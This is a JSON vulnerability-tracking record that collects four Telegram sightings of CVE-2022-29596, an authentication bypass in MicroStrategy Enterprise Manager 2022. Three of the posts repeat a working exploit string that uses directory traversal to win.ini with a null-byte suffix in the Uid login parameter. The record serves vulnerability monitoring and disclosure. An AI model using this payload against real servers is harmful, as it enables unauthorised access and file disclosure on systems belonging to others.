{"vulnerability": "CVE-2022-29596", "sightings": [{"uuid": "95bfc649-8489-4aff-bb91-fcd436a1a9a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-29596", "type": "seen", "source": "https://t.me/cibsecurity/42452", "content": "\u203c CVE-2022-29596 \u203c\n\nMicroStrategy Enterprise Manager 2022 allows authentication bypass by triggering a login failure and then entering the Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&amp;Pwd=_any_password_&amp;ConnMode=1&amp;3054=Login substring for directory traversal.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-05-12T00:34:35.000000Z"}, {"uuid": "6e91933f-bc2c-4057-86db-dee5a75460dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-29596", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1211", "content": "CVE-2022-29596\nMicroStrategy Enterprise Manager 2022\n\u043e\u0431\u0445\u043e\u0434\u0438\u043c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e, \u0432\u044b\u0437\u044b\u0432\u0430\u044f \u043e\u0448\u0438\u0431\u043a\u0443 \u0432\u0445\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443, \u0430 \u0437\u0430\u0442\u0435\u043c \u0432\u0432\u043e\u0434\u044f:\n\nUid=/../../../../../../../../../../../windows/win.ini%00.jpg&amp;Pwd=_any_password_&amp;ConnMode=1&amp;3054=Login\n\n#microsoft #bypass", "creation_timestamp": "2022-12-08T09:14:46.000000Z"}, {"uuid": "4994dfc3-1077-45fe-9106-1f4275d0c656", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-29596", "type": "published-proof-of-concept", "source": "Telegram/9o0ymoPbqxJogDBdOsK7IpGE8avxrE6uGvpNwdwk5ffIOlw", "content": "", "creation_timestamp": "2022-12-13T07:08:05.000000Z"}, {"uuid": "ae07acf5-0e15-4f3c-b4fe-8958861ed119", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-29596", "type": "seen", "source": "https://t.me/LearnExploit/4380", "content": "CVE-2022-29596 ( MicroStrategy Enterprise Manager 2022 )\n\nUid=/../../../../../../../../../../../windows/win.ini%00.jpg&amp;Pwd=_any_password_&amp;ConnMode=1&amp;3054= Login\n\n#microsoft #bypass\n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-01-04T10:02:38.000000Z"}]}